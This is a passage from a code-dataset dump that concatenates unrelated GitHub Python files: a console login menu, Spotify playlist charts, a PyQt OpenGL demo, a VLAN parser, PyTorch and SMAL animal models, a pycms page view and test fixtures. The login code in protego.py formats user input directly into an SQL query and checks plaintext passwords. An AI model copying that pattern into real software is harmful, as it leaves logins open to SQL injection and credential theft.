pop=int(input(\"Enter your choice:\"))\r\n if pop==1:\r\n Map()\r\n elif pop==2:\r\n Graph()\r\n elif pop==3:\r\n Track()\r\n elif pop==4:\r\n Quiz()\r\n else:\r\n print(\"Choose from the options\")\r\n else:\r\n print(\"Something went wrong...Credentials not matching\")\r\n elif choice==2:\r\n print(\"Now you may login!\")\r\n Log=input(\"Enter the Login Id:\")\r\n pas=input(\"Enter your password:\")\r\n cur.execute(\"Select Loginid,password from Log where Loginid='{}' and password='{}'\".format(Log,pas))\r\n row=cur.fetchone()\r\n if row!=None:\r\n print(\"You have successfully logged in....!\")\r\n print(\"#####################\")\r\n print(\"1. Maps\")\r\n print(\"2. Graphs\")\r\n print(\"3. Tracker\")\r\n print(\"4. Quiz\")\r\n gh=int(input(\"Enter your choice:\"))\r\n if gh==1:\r\n Map()\r\n elif gh==2:\r\n Graph()\r\n elif gh==3:\r\n Track()\r\n elif gh==4:\r\n Quiz()\r\n else:\r\n print(\"Choose from the options\")\r\n poi=\"Y\"\r\n while poi==\"Y\" or poi==\"y\":\r\n poi=input(\"Do you want to view other choices?(Y/N):\")\r\n if poi!=\"Y\" and poi!=\"y\":\r\n print(\"Exiting...\")\r\n print(\"#####################\")\r\n break\r\n print(\"1. Maps\")\r\n print(\"2. Graphs\")\r\n print(\"3. Tracker\")\r\n print(\"4. Quiz\")\r\n pop=int(input(\"Enter your choice:\"))\r\n if pop==1:\r\n Map()\r\n elif pop==2:\r\n Graph()\r\n elif pop==3:\r\n Track()\r\n elif pop==4:\r\n Quiz()\r\n else:\r\n print(\"Choose from the options\")\r\n else:\r\n print(\"Something went wrong...Credentials not found\")\r\n else:\r\n print(\"Choose from the options\")\r\n","repo_name":"SIyer-45/Protego","sub_path":"protego.py","file_name":"protego.py","file_ext":"py","file_size_in_byte":18287,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"28215800927","text":"import pandas as pd\nimport plotly.graph_objects as go\nfrom plotly.offline import plot\nimport plotly.express as px\n\ndef make_figures(data, track_name, popularity):\n\n # Build Figure Section ----------------------------------------------\n categories = [\"energy\", \"liveness\", \"speechiness\",\t\"acousticness\",\t\"instrumentalness\", \"danceability\",\t\"valence\"]\n \n r = data.mean()\n # Avg audio features of the TOP 500 Rolling Stones Magazine\n r2 = [0.601546, 0.215710, 0.064273, 0.345752, 0.037234, 0.554010, 0.638210]\n # Avg audio features of the TOP Tracks 2020 Germany\n r3 = [0.658820, 0.169402, 0.148086, 0.223102, 0.019515, 0.737580, 0.539320]\n\n fig = go.Figure()\n\n fig.add_trace(go.Scatterpolar(\n r=r,\n theta=categories,\n fill='toself',\n name='Your playlist profile',\n fillcolor=\"red\"\n ))\n fig.add_trace(go.Scatterpolar(\n r=r2,\n theta=categories,\n fill='toself',\n fillcolor=\"green\",\n name='TOP 500 Rolling Stones Magazine Profile',\n opacity = 0.4,\n visible='legendonly'\n ))\n fig.add_trace(go.Scatterpolar(\n r=r3,\n theta=categories,\n fill='toself',\n fillcolor='blue',\n name='TOP Tracks 2020 Germany',\n opacity = 0.4,\n visible='legendonly'\n ))\n\n fig.update_layout(\n polar=dict(\n radialaxis=dict(\n visible=True,\n range=[0, 1]\n )),\n showlegend=True,\n title=\"Your music profile\",\n title_x=0.5,\n font=dict(\n family=\"Arial\",\n size=12,\n color=\"black\"),\n legend=dict(\n orientation=\"v\",\n y=-0.45,\n x=0.3\n ),\n paper_bgcolor='rgba(0,0,0,0)',\n plot_bgcolor='rgba(0,0,0,0)'\n )\n\n fig.update_traces(mode=\"none\", selector=dict(type='scatterpolar'))\n\n config = dict({'displaylogo': False,\n 'scrollZoom': True,\n 'displayModeBar': False\n })\n\n figure = plot(fig, config=config, output_type='div')\n\n # Violin Figure Section ----------------------------------------------------------------\n data_violin = {\"tracks\": track_name,\n \"popularity\": popularity}\n\n df_violin = pd.DataFrame(data_violin, columns = ['tracks', 'popularity'])\n\n fig_violin = px.violin(df_violin[\"popularity\"], box=True,# draw box plot inside the violin\n points='outliers', # can be 'outliers', 'all', or False\n )\n\n fig_violin.update_layout(title=\"Popularity of your Music\",\n title_x=0.5,\n paper_bgcolor='rgba(0,0,0,0)',\n plot_bgcolor='rgba(0,0,0,0)'\n )\n\n config_violin = dict({'displaylogo': False,\n 'scrollZoom': True,\n 'displayModeBar': False\n })\n\n fig_violin_plot = plot(fig_violin, config=config_violin, output_type='div')\n\n return figure, fig_violin_plot","repo_name":"marwonn/spotify-playlist-generator-analyzer","sub_path":"helper/figures.py","file_name":"figures.py","file_ext":"py","file_size_in_byte":3243,"program_lang":"python","lang":"en","doc_type":"code","stars":39,"dataset":"github-code","pt":"36"} +{"seq_id":"29997837249","text":"from OpenGL.GL import *\nfrom OpenGL.GLU import *\n\nimport sys\n\nfrom PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QOpenGLWidget\n\n\nclass MyGLWindow(QOpenGLWidget):\n\n def __init__(self, parent=None):\n super(MyGLWindow, self).__init__(parent)\n\n def initializeGL(self):\n # OpenGL 그리기를 수행하기 전에 각종 상태값을 초기화\n glClearColor(0.8, 0.8, 0.6, 1.0)\n\n def resizeGL(self, width, height):\n # 카메라의 투영 특성을 여기서 설정\n glMatrixMode(GL_PROJECTION)\n glLoadIdentity()\n\n def paintGL(self):\n glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)\n glMatrixMode(GL_MODELVIEW)\n glLoadIdentity()\n\n # 색과 프리미티브를 이용한 객체 그리기\n glColor3f(0.5, 0.5, 0.8)\n glBegin(GL_TRIANGLES)\n glVertex3fv([-1.0, 0.0, 0.0])\n glVertex3fv([ 1.0, 0.0, 0.0])\n glVertex3fv([ 0.0, 1.0, 0.0])\n glEnd()\n\n # 그려진 프레임버퍼를 화면으로 송출\n glFlush()\n\ndef main(argv = []):\n app = QApplication(argv)\n window = MyGLWindow()\n window.setWindowTitle('Example1')\n window.setFixedSize(600, 600)\n window.show()\n sys.exit(app.exec_())\n\nif __name__ == '__main__':\n main(sys.argv)\n","repo_name":"dknife/2021Graphics","sub_path":"Source/01_Windowing/03_FirstGLWindow.py","file_name":"03_FirstGLWindow.py","file_ext":"py","file_size_in_byte":1288,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"36"} +{"seq_id":"22773599993","text":"import json\nimport sys\n\n# Define a function to parse a JSON file and extract VLAN IDs\ndef parse_vlans(filename):\n\n # Try to open the file and load its contents as JSON\n try:\n with open(filename) as f:\n data = json.load(f)\n \n # If there is an error parsing the JSON, print an error message and return None\n except json.JSONDecodeError:\n print(f\"Error parsing {filename} as JSON\")\n return None\n\n # Create an empty set to store the VLAN IDs\n vlan_ids = set()\n \n # Iterate over each item in the JSON data\n for item in data.get(\"items\", []): \n # Get the VLAN ID from the current item\n vlan_id = item.get(\"vn_instance\", {}).get(\"vlan_id\")\n \n # If the VLAN ID exists, add it to the set of VLAN IDs\n if vlan_id:\n vlan_ids.add(int(vlan_id))\n\n # If no VLAN IDs were found, return None\n if not vlan_ids:\n return None\n\n # Return the list of VLAN IDs\n return list(vlan_ids)\n\n# Define a function to print the results of the VLAN extraction\ndef print_results(filename, vlans):\n\n # If no VLANs were found, print an error message and return\n if not vlans:\n print(f\"No VLANs found in {filename}\")\n return\n\n # Print the filename and the list of VLANs\n print(f\"VLANs from {filename}:\")\n print(vlans)\n print(f\"Count: {len(vlans)}\")\n\n# Call the functions to parse the JSON files and print the results\nfile1 = \"rz.json\"\nfile2 = \"vlans.json\"\n\nvlans1 = parse_vlans(file1)\nprint_results(file1, vlans1)\n\nvlans2 = parse_vlans(file2)\nprint_results(file2, vlans2)","repo_name":"deltasierra/blueprint_vlans","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1592,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"28295142405","text":"# Implements shooting method for Sigmoidal kinetics model\n\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n\nclass Sigmoidal(nn.Module):\n def __init__(self, n_vars):\n super(Sigmoidal, self).__init__()\n self.n_vars = n_vars\n self.lin2 = nn.Linear(self.n_vars, self.n_vars)\n self.lin1 = nn.Linear(self.n_vars, self.n_vars)\n\n def forward(self, state):\n z = torch.sigmoid(self.lin1(state))\n return self.lin2(z)\n\n # parameter inference with stochastic gradient descent\n # inputs:\n # states: np.array(steps, n_vars)\n # velocities: np.array(steps, n_vars)\n # steps: int\n # output:\n # np.array(n_vars, n_vars) of final parameters\n def solve(self, states, velocities, iterations=1000, lr=1.0):\n states = torch.tensor(states, dtype=torch.float)\n velocities = torch.tensor(velocities, dtype=torch.float)\n optim = torch.optim.SGD(self.parameters(), lr=lr)\n for i in range(iterations):\n optim.zero_grad()\n output = self.forward(states)\n loss = F.mse_loss(output, velocities)\n loss.backward()\n optim.step()\n\n # rolls out a trajectory from optional initial condition\n # inputs:\n # state: np.array(n_vars) - initial states\n # velocity: np.array(n_vars) - initial time derivative\n # delta: float - time difference between steps\n # steps: int - number of steps to roll out\n # output:\n # np.array(steps, n_vars), np.array(steps, n_vars)\n # states and velocities for each simulated timestep\n def run(self, state=None, velocity=None, delta=0.001, steps=100):\n if state is None:\n state = np.random.random(self.n_vars)\n if velocity is None:\n velocity = np.random.random(self.n_vars)\n states = []\n velocities = []\n with torch.no_grad():\n state = torch.tensor(state, dtype=torch.float)\n velocity = torch.tensor(velocity, dtype=torch.float)\n for i in range(steps):\n velocity = self.forward(state)\n states.append(state.numpy().copy())\n velocities.append(velocity.numpy().copy())\n state += velocity * delta\n return np.vstack(states), np.vstack(velocities)\n","repo_name":"warut-vijit/modelsel","sub_path":"sigmoidal.py","file_name":"sigmoidal.py","file_ext":"py","file_size_in_byte":2381,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"29719161157","text":"\"\"\"\nDay 1 part 2\n\namount of fuel for a module is based on mass\nfloor(mass / 3) - 2\n\npart 2: we need to calculate fuel for the fuel...\nas long as the calculated fuel is not negative \n (aka the floor doesen't amount to 2 or less)\nthen we need to add the new fuel\n\ntest cases\n12 -> 2\n14 -> 2\n1969 -> 654 + 216 + 70 + 21 + 5 = 966\n100756 -> 33583 + 11192 + 3728 + 1240 + 411 + 135 + 43 + 12 + 2 = 50346\n\noutput:\nsum of the fuel required for each module\n\"\"\"\nfrom utils import read_input\n\n\ndef calc_fuel(mass):\n \"\"\"floor of the mass divided by 3 minus 2\"\"\"\n fuel = (mass // 3) - 2\n # check if added fuel is less than 0\n if fuel <= 0:\n return 0\n # otherwise recurse to add the fuel for our fuel\n return fuel + calc_fuel(fuel)\n\n\ndef tests():\n \"\"\"tests from the description\"\"\"\n assert calc_fuel(12) == 2\n assert calc_fuel(14) == 2\n assert calc_fuel(1969) == 966\n assert calc_fuel(100756) == 50346\n\n\ntests()\n\nassert sum(calc_fuel(int(l)) for l in read_input(1)) == 5268207\n","repo_name":"yknot/adventOfCode","sub_path":"2019/01_02.py","file_name":"01_02.py","file_ext":"py","file_size_in_byte":1004,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"35852780796","text":"from __future__ import absolute_import\n\nfrom .base import ContentView, EditView\nfrom ..models.image import Image\nfrom ..parser import Parser\nfrom pyramid.view import render_view\nfrom ..blocks.registry import Registry\nfrom ..utils import generate_id\n\nfrom chameleon import PageTemplate\n\n\nclass PageView(ContentView):\n\n \"\"\" Project specific view \"\"\"\n\n def __init__(self, context, request):\n\n ContentView.__init__(self, context, request)\n\n @property\n def is_edit(self):\n\n return False\n\n @property\n def can_edit(self):\n\n return self.request.has_permission(\"edit\", self.context)\n\n @property\n def content(self):\n\n \"\"\" We may or may not use a complex layout... \"\"\"\n\n if not self.context._data_['use_complex_layout']:\n\n return self.context._data_['text']\n\n html = []\n\n self.request.is_edit = self.is_edit\n\n height = 0\n\n for block in self.context.blocks:\n\n try:\n block_height = int(float(block.get(\"height\", \"200px\")[:-2]))\n block_top = int(float(block.get(\"top\", \"10px\")[:-2]))\n\n height = max(height, block_top + block_height)\n except:\n pass\n\n html.append(render_view(block, self.request))\n\n return \"\"\"
    %s
    \"\"\" \\\n % (height + 20, \"\".join(html))\n\n @property\n def layout(self):\n\n html = []\n\n self.request.is_edit = self.is_edit\n\n for block in self.context.blocks:\n\n html.append(render_view(block, self.request))\n\n return \"\".join(html)\n\n\nclass PageBlocks(PageView):\n\n \"\"\" Block view of page \"\"\"\n\n @property\n def blocks(self):\n\n res = []\n\n for block in self.context.blocks:\n\n self._create_block_repr(block, res)\n\n return \"\".join(res)\n\n def _create_block_repr(self, block, data):\n\n data.append(\"\"\"
    \"\"\")\n data.append(\"\"\"\"\"\" % block.id)\n data.append(\"
    \")\n\n\nclass PageEdit(EditView):\n\n pass\n\n\nclass PageLayout(PageView):\n\n \"\"\" Edit view for page \"\"\"\n\n @property\n def is_edit(self):\n\n return True\n\n @property\n def raw_content(self):\n\n return self.context._content\n\n def save(self):\n\n \"\"\" Parse html, and extract blocks. \"\"\"\n\n parser = Parser(self.context)\n\n self.context.clear_blocks()\n\n parser.parse(self.request.params.get('content', \"\"))\n\n self.context._p_changed = True\n\n self.context._content = self.request.params.get('content', \"\")\n\n return {}\n\n def save_block(self):\n\n \"\"\" but not really... we only create the proper html \"\"\"\n\n clazz = Registry.get_type(self.request.params.get('type'))\n\n if not clazz:\n return {'html': ''}\n\n block = clazz(self.request.params.get(\"id\"), **self.request.params)\n\n if block['type'] == \"image\":\n\n if self.request.params.get('mode') == 'add':\n\n img_id = self.context.generate_content_id(\n self.request.params.get('img').filename)\n\n img = Image(img_id,\n {'name': img_id,\n 'data': {\n 'name': self.request.params.get('img').filename,\n 'data': self.request.params.get('img').value\n }\n })\n\n self.context.add_content(img)\n\n block['img_url'] = '%s%s' % (self.url, img_id)\n\n self.request.is_edit = True\n\n return \"%s\" % render_view(block, self.request)\n\n self.request.is_edit = True\n\n return render_view(block, self.request)\n\n def add_form(self):\n\n \"\"\" show add form for given type \"\"\"\n\n typp = self.request.params.get('type')\n clazz = Registry.get_type(typp)\n\n if not clazz:\n return {'html': '
    No form found
    '}\n\n tpl = PageTemplate(clazz.add_form)\n\n form = tpl(data={\n 'id': generate_id(prefix=\"%s_\" % typp, length=10)})\n\n return {'html': form}\n\n def edit_form(self):\n\n \"\"\" Show edit form for given block type \"\"\"\n\n clazz = Registry.get_type(self.request.params.get('type'))\n\n if not clazz:\n return {'html': '
    No form found
    '}\n\n tpl = PageTemplate(clazz.edit_form)\n\n data = self._params_to_dict(self.request.params)\n data['mode'] = 'edit'\n\n form = tpl(data=data)\n\n return {'html': form}\n\n def get_block(self, block_id):\n\n return self.context.get_block_by_ref(block_id)\n\n def page_actions(self):\n\n layoutsubs = [\n {'id': 'grid',\n 'title': 'Grid',\n 'action': 'javascript: pycms.selectLayout(\"grid\")',\n 'permission': 'edit'\n },\n {'id': '2col',\n 'title': '2 columns',\n 'action': 'javascript: pycms.selectLayout(\"2col\")',\n 'permission': 'edit'\n },\n {'id': '3col',\n 'title': '3 columns',\n 'action': 'javascript: pycms.selectLayout(\"3col\")',\n 'permission': 'edit'\n },\n {'id': '4col',\n 'title': '4 columns',\n 'action': 'javascript: pycms.selectLayout(\"4col\")',\n 'permission': 'edit'\n },\n ]\n\n subs = []\n\n for tp in Registry.list_types():\n\n subs.append({'id': 'add_%s' % tp,\n 'title': '%s' % tp,\n 'action': 'javascript: pycms.addBlock(\"%s\")' % tp,\n 'permission': 'edit'\n })\n\n return [\n {'id': 'pick_layout',\n 'title': 'Select layout...',\n 'action': '',\n 'permission': 'edit',\n 'subs': layoutsubs\n },\n {'id': 'add_block',\n 'title': 'Add block...',\n 'action': '',\n 'permission': 'edit',\n 'subs': subs\n },\n {'id': 'delete',\n 'title': 'Delete',\n 'action': 'javascript: pycms.deleteBlock()',\n 'permission': 'edit'\n },\n {'id': 'edit',\n 'title': 'Edit',\n 'action': 'javascript: pycms.editBlock()',\n 'permission': 'edit'\n },\n {'id': 'cut',\n 'title': 'Cut',\n 'action': 'javascript: pycms.cutBlock()',\n 'permission': 'edit'\n },\n {'id': 'paste',\n 'title': 'Paste',\n 'action': 'javascript: pycms.pasteBlock()',\n 'permission': 'edit'\n },\n {'id': 'save',\n 'title': 'Save',\n 'action': 'javascript: pycms.savePage()',\n 'permission': 'edit'\n },\n ]\n\n def _params_to_dict(self, params):\n\n \"\"\" create simple dict from multidict \"\"\"\n\n simple = {}\n\n for key in list(params.keys()):\n\n simple[key] = params.get(key)\n\n return simple\n","repo_name":"wyldebeast-wunderliebe/w20e.pycms","sub_path":"w20e/pycms/views/page.py","file_name":"page.py","file_ext":"py","file_size_in_byte":7240,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"36"} +{"seq_id":"20029746349","text":"\"\"\"\n\n PyTorch implementation of the SMAL/SMPL model\n\n\"\"\"\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport numpy as np\nimport torch\nfrom torch.autograd import Variable\nimport pickle as pkl \nfrom .batch_lbs import batch_rodrigues, batch_global_rigid_transformation\nfrom .smal_basics import align_smal_template_to_symmetry_axis, get_smal_template\nimport torch.nn as nn\nimport config\n\n# There are chumpy variables so convert them to numpy.\ndef undo_chumpy(x):\n return x if isinstance(x, np.ndarray) else x.r\n\n\n'''\nJ_regressor_prior: 关节回归矩阵的先验\nJ_regressor: 关节回归矩阵\nf: 面(3个点的索引)\nkintree_table: 关节树表\nJ: 关节位置\nweight_prior: 蒙皮权重先验\nweight: 蒙皮权重\nvert_sym_idxs: 顶点索引\nposedirs: 姿态矫正\nbs_type: 姿态矫正蒙皮方式(lrotmin)\nv_template: T pose顶点信息(基础模型)\nshapedirs: 形状矫正 \nbs_style: 形状矫正蒙皮方式(lbs)\n'''\n\n\ndef caclulate_bone_lengths_from_J(J, parents):\n # NEW: calculate bone lengths:\n all_bone_lengths_list = []\n for i in range(1, parents.shape[0]):\n bone_vec = J[:, i] - J[:, parents[i]]\n bone_length = torch.sqrt(torch.sum(bone_vec ** 2, axis=1)) # 一个bs中骨架一对关节点的距离\n all_bone_lengths_list.append(bone_length)\n all_bone_lengths = torch.stack(all_bone_lengths_list)\n\n return all_bone_lengths # .permute((1,0))\n\nclass SMAL(nn.Module):\n def __init__(self, device, shape_family_id=-1, dtype=torch.float):\n super(SMAL, self).__init__()\n\n # -- Load SMPL params --\n # with open(pkl_path, 'r') as f:\n # dd = pkl.load(f)\n \n with open(config.SMAL_FILE, 'rb') as f:\n u = pkl._Unpickler(f)\n u.encoding = 'latin1'\n dd = u.load()\n\n self.f = dd['f']\n '''(7774,3)三角网格数量'''\n self.faces = torch.from_numpy(self.f.astype(int)).to(device)\n\n # replaced logic in here (which requried SMPL library with L58-L68)\n '''(3889,3)基础模型'''\n v_template = get_smal_template(\n model_name=config.SMAL_FILE,\n data_name=config.SMAL_DATA_FILE,\n shape_family_id=-1)\n\n v_sym, self.left_inds, self.right_inds, self.center_inds = \\\n align_smal_template_to_symmetry_axis(v_template, sym_file=config.SMAL_SYM_FILE)\n # Mean template vertices\n self.v_template = Variable(torch.Tensor(v_sym),requires_grad=False).to(device)\n\n # Size of mesh [Number of vertices, 3]\n self.size = [v_template.shape[0], 3]\n '''(3889,3,41) >> 41'''\n self.num_betas = dd['shapedirs'].shape[-1]\n # Shape blend shape basis\n '''(41,11667)'''\n shapedir = np.reshape(\n undo_chumpy(dd['shapedirs']), [-1, self.num_betas]).T.copy()\n\n self.shapedirs = Variable(\n torch.Tensor(shapedir), requires_grad=False).to(device)\n\n # if shape_family_id != -1:\n # with open(config.SMAL_DATA_FILE, 'rb') as f:\n # u = pkl._Unpickler(f)\n # u.encoding = 'latin1'\n # data = u.load()\n # # Select mean shape for quadruped type\n # '''(5,41) >> (41,) 指定基礎動物模型'''\n # # betas = data['cluster_means'][shape_family_id]#类别模型\n # betas = np.zeros_like(data['cluster_means'][shape_family_id])\n # '''(3889,3)'''\n # v_template = v_template + np.matmul(betas[None,:], shapedir).reshape(\n # -1, self.size[0], self.size[1])[0]\n\n # (35,3889)\n # Regressor for joint locations given shape \n # self.J_regressor = Variable(\n # torch.Tensor(dd['J_regressor'].T.todense()),\n # requires_grad=False).to(device)\n\n self.J_regressor = Variable(\n torch.Tensor(dd['J_regressor'].T), requires_grad=False).to(device)###\n\n\n # Pose blend shape basis =306\n num_pose_basis = dd['posedirs'].shape[-1]\n \n posedirs = np.reshape(\n undo_chumpy(dd['posedirs']), [-1, num_pose_basis]).T\n self.posedirs = Variable(\n torch.Tensor(posedirs), requires_grad=False).to(device)\n # (2,35)\n # indices of parents for each joints\n self.parents = dd['kintree_table'][0].astype(np.int32)\n self.kintree_table = dd['kintree_table']\n\n # LBS weights\n self.weights = Variable(\n torch.Tensor(undo_chumpy(dd['weights'])),\n requires_grad=False).to(device)\n\n\n def __call__(self, beta, theta, trans=None, del_v=None, betas_logscale=None, get_skin=True, v_template=None):\n\n if True:\n nBetas = beta.shape[1]\n else:\n nBetas = 0\n\n # print(\"\\ntheta: \",theta)\n\n \n # v_template = self.v_template.unsqueeze(0).expand(beta.shape[0], 3889, 3)\n if v_template is None:\n v_template = self.v_template\n\n # 1. Add shape blend shapes\n \n if nBetas > 0:#20\n if del_v is None:\n # print(\"\\nbeta: \", beta)\n v_shaped = v_template + torch.reshape(torch.matmul(beta, self.shapedirs[:nBetas,:]), [-1, self.size[0], self.size[1]])\n else:\n v_shaped = v_template + del_v + torch.reshape(torch.matmul(beta, self.shapedirs[:nBetas,:]), [-1, self.size[0], self.size[1]])\n else:\n if del_v is None:\n v_shaped = v_template.unsqueeze(0)\n else:\n v_shaped = v_template + del_v \n '''3889个顶点转为35个关节点'''\n # 2. Infer shape-dependent joint locations.\n Jx = torch.matmul(v_shaped[:, :, 0], self.J_regressor)\n Jy = torch.matmul(v_shaped[:, :, 1], self.J_regressor)\n Jz = torch.matmul(v_shaped[:, :, 2], self.J_regressor)\n #(1,35,3)\n J = torch.stack([Jx, Jy, Jz], dim=2)\n\n # all_bone_length = caclulate_bone_lengths_from_J(J,self.parents)\n # print(all_bone_length.shape, all_bone_length)\n # np.savetxt(\"/media/scau2311/A/xcg/barc_release/data/pig_smal_data/mean_pig_bone_lengths.txt\",\n # all_bone_length, fmt=\"%.18f\")\n\n # 3. Add pose blend shapes\n # N x 24 x 3 x 3\n if len(theta.shape) == 4:\n Rs = theta\n else:# N x 35 x 3 x 3 用3x3的旋转矩阵表示的关节点的全局旋转矩阵\n # theta[0,0] = torch.zeros(1, 3)\n Rs = torch.reshape(batch_rodrigues(torch.reshape(theta, [-1, 3])), [-1, 35, 3, 3])\n \n # Ignore global rotation.\n # (1,306) 当前姿态和306个静止姿态的相对旋转值 34X9\n pose_feature = torch.reshape(Rs[:, 1:, :, :] - torch.eye(3).to(beta.device), [-1, 306])\n # print(pose_feature)\n #(1,3889,3)\n v_posed = torch.reshape(\n torch.matmul(pose_feature, self.posedirs),#混合变形计算\n [-1, self.size[0], self.size[1]]) + v_shaped\n #J_transformed=(1,35,3)3元素?\n #A=(1,35,4,4)\n #4. Get the global joint location 以0号节点为根节点,其他节点先对其的旋转角度,表示模型的全局旋转\n self.J_transformed, A = batch_global_rigid_transformation(\n Rs, J, self.parents)#, betas_logscale=betas_logscale\n\n\n # 5. Do skinning:\n num_batch = theta.shape[0]\n #(3889,35)蒙皮权重\n weights_t = self.weights.repeat([num_batch, 1])\n W = torch.reshape(weights_t, [num_batch, -1, 35])\n\n #(1,3889,4,4)\n T = torch.reshape(\n torch.matmul(W, torch.reshape(A, [num_batch, 35, 16])), [num_batch, -1, 4, 4])\n #(1,3889,4)加1列全为1\n v_posed_homo = torch.cat(\n [v_posed, torch.ones([num_batch, v_posed.shape[1], 1]).to(device=beta.device)], 2)\n #(1,3889,4,1)\n v_homo = torch.matmul(T, v_posed_homo.unsqueeze(-1))\n\n verts = v_homo[:, :, :3, 0]\n\n if trans is None:\n trans = torch.zeros((num_batch,3)).to(device=beta.device)\n\n verts = verts + trans[:, None, :]\n # print(\"tran: \",trans)\n\n # Get joints:变换后的关节位置\n # joint_x = torch.matmul(verts[:, :, 0], self.J_regressor)\n # joint_y = torch.matmul(verts[:, :, 1], self.J_regressor)\n # joint_z = torch.matmul(verts[:, :, 2], self.J_regressor)\n # joints = torch.stack([joint_x, joint_y, joint_z], dim=2)\n joints = self.J_transformed\n\n joints = torch.cat([\n joints,\n verts[:, None, 257], # 35 nose\n verts[:, None, 237], # 36 chin\n verts[:, None, 3700], # 37 left ear tip\n verts[:, None, 1820], # 38 right ear tip\n verts[:, None, 3816], # 39 left eye\n verts[:, None, 1936], # 40 right eye\n verts[:, None, 321], # 41 throat\n ], dim = 1) \n\n # import matplotlib.pyplot as plt\n # plt.ion()\n # plt.figure(figsize=[10, 8])\n # ax = plt.axes(projection=\"3d\")\n # joints_x, joints_y, joints_z = joints.cpu()[0][:, 0].detach().numpy(), joints.cpu()[0][:, 1].detach().numpy(), joints.cpu()[0][:,2].detach().numpy()\n # verts_x, verts_y, verts_z = v_template[:, 0].cpu().detach().numpy(), v_template[:, 1].cpu().detach().numpy(),v_template[:, 2].cpu().detach().numpy()\n #\n # # ax.scatter3D(joints_x, joints_y, joints_z, s=50, c='red', label='3d')\n # ax.scatter3D(verts_x, verts_y, verts_z, s=10, c='blue', label='3d',alpha=0.5)\n # for i, j in enumerate(config.PIG_MODEL_JOINTS_NAME):\n # ax.text3D(joints.cpu()[0][i][0].detach().numpy(), joints.cpu()[0][i][1].detach().numpy(),\n # joints.cpu()[0][i][2].detach().numpy(), j)\n # # ax.scatter3D(proj_points[0][:, 0].detach().numpy(), proj_points[0][:, 1].detach().numpy(),\n # # np.zeros_like(proj_points[0][:,0].detach().numpy()), s=50, c='blue', label='2d')\n # ax.legend()\n # # kintree_table = [[6, 7], [7, 8], [8, 11], [9, 10], [10, 11], [3, 4], [4, 5], [3, 4],\n # # [0, 1], [1, 2], [2, 5], [2, 8], [2, 15],\n # # [8, 16], [15, 19], [16, 20],\n # # [16, 22], [15, 21], [21, 17], [22, 17], [18, 17],\n # # [11, 12], [5, 12], [12, 13], [13, 14]]\n # for i in self.kintree_table.T:\n # if i[0] > 35:\n # i=[0,0]\n # x1, y1, z1 = [], [], []\n # x2, y2, z2 = [], [], []\n # for j in i: # 两个点相连\n # x1.append(float(joints_x[j]))\n # y1.append(float(joints_y[j]))\n # z1.append(float(joints_z[j]))\n # x2.append(float(Jx[0][j]))\n # y2.append(float(Jy[0][j]))\n # z2.append(float(Jz[0][j]))\n # ax.plot3D(x1, y1, z1, color='red', marker='o', linestyle='dashed', linewidth=2, markersize=10,\n # label=\"first\")\n # # ax.plot3D(x2, y2, z2, color='red', marker='o', linestyle='dashed', linewidth=2, markersize=10, label=\"second\")\n # ax.text3D(x1[0], y1[0], z1[0], \"3d\", fontsize=10)\n # # ax.text3D(x2[0], y2[0], z2[0], \"second\", fontsize=10)\n # # plt.savefig(rf\"E:\\DL\\SMALify\\outputs\\pigs\\vis_joints\\{time.time()}.png\")\n # # plt.close('all')\n # plt.xlabel('X')\n # plt.ylabel('Y') # y 轴名称旋转 38 度\n # ax.set_zlabel('Z', rotation=90) # 因为 plt 不能设置 z 轴坐标轴名称,所以这里只能用 ax 轴来设置(当然,x 轴和 y 轴的坐标轴名称也可以用 ax 设置)\n # import time\n # time0 = time.time()\n # # plt.savefig(f\"/media/scau2311/A/xcg/SMALify/outputs/pigs/000000054901/vis_results/3d_joint_{time0}.jpg\")\n # plt.pause(10)\n # plt.show()\n\n if get_skin:\n return verts, joints, Rs, v_shaped##\n else:\n return joints\n","repo_name":"G-Apple1/SMALify-Pig3D","sub_path":"smal_model/smal_torch.py","file_name":"smal_torch.py","file_ext":"py","file_size_in_byte":12034,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"22529547208","text":"from __future__ import absolute_import\nfrom typing import Tuple\nimport os\nimport json\n\nimport pytest\nimport pandas as pd\nimport numpy as np\nfrom pathlib import Path\n\nfrom castor.detector.suppressor.suppressor import SuppressorPipeline\nfrom castor.utils import logger as llogger\nfrom castor.utils import const as con\nfrom castor.detector.cache.cache import CacheSet\nfrom castor.detector.cache.organize_cache import clear_cache\n\npd.set_option(\"display.max_rows\", None)\npd.set_option(\"display.max_columns\", None)\n\nCURRENT_PATH = os.path.dirname(os.path.abspath(__file__))\nTESTS_PATH = os.path.split(CURRENT_PATH)[0]\nCONF_PATH = os.path.join(\n Path(__file__).parents[2], \"demo\", \"demo_conf\", \"detect_base.yaml\"\n)\nDATA_PATH = os.path.join(TESTS_PATH, \"data\")\nwith open(os.path.join(TESTS_PATH, \"conf\", \"test.json\")) as f:\n tests_params = json.load(f)\nllogger.basic_config(level=\"DEBUG\")\n\nsuppress_module = [\"transient\", \"continuous\"]\nif_anomaly = [True, False]\n\nparams = {\n \"transient\": {\n \"cache_length\": 30,\n \"TransientAnomalySuppressor\": {con.WINDOW: 5, \"anomalies\": 3},\n },\n \"continuous\": {\n \"cache_length\": 30,\n \"ContinuousAnomalySuppressor\": {con.GAP: \"10D\"},\n },\n}\n\nresult = {\"transient\": {True: 1, False: 0}, \"continuous\": {True: 1, False: 0}}\n\n\ndef pandas_wrap(data: np.ndarray, data_type: str):\n if data_type == \"detect_result\":\n return pd.DataFrame(\n data,\n index=pd.date_range(start=\"2021-01-02\", periods=len(data), freq=\"1D\"),\n columns=[\"lacolumn\"],\n )\n elif data_type == \"ori_data\":\n return pd.DataFrame(\n data,\n 